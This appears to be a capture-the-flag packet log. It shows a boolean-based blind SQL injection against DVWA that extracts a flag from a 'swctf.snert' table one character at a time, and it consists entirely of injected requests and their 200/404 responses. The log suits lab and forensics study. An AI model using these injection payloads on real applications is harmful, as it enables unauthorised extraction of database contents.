GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),9,1))>108 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),9,1))>106 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),9,1))>107 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),10,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),10,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),10,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),10,1))>100 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),10,1))>102 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),10,1))>101 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),11,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),11,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),11,1))>120 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),11,1))>116 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),11,1))>114 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),11,1))>113 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),12,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),12,1))>48 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),12,1))>72 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),12,1))>84 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),12,1))>90 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),12,1))>93 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),12,1))>94 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),12,1))>95 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),13,1))>64 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),13,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),13,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),13,1))>120 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),13,1))>116 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),13,1))>114 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),13,1))>115 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),14,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),14,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),14,1))>120 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),14,1))>116 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),14,1))>114 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),14,1))>113 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),15,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),15,1))>48 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),15,1))>72 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),15,1))>60 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),15,1))>54 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),15,1))>51 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),15,1))>49 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),16,1))>47 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),16,1))>87 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),16,1))>107 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),16,1))>117 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),16,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),16,1))>109 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),16,1))>108 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),17,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),17,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),17,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),17,1))>100 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),17,1))>98 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),17,1))>97 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),18,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),18,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),18,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),18,1))>108 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),18,1))>110 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),18,1))>111 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),19,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),19,1))>48 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),19,1))>72 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),19,1))>84 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),19,1))>90 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),19,1))>93 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),19,1))>94 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),19,1))>95 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),20,1))>64 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),20,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),20,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),20,1))>120 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),20,1))>116 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),20,1))>114 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),20,1))>115 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),21,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),21,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),21,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),21,1))>100 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),21,1))>102 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),21,1))>101 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),22,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),22,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),22,1))>120 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),22,1))>116 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),22,1))>114 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),22,1))>115 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),23,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),23,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),23,1))>120 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),23,1))>116 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),23,1))>114 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),23,1))>115 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),24,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),24,1))>48 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),24,1))>1 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),24,1))>24 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
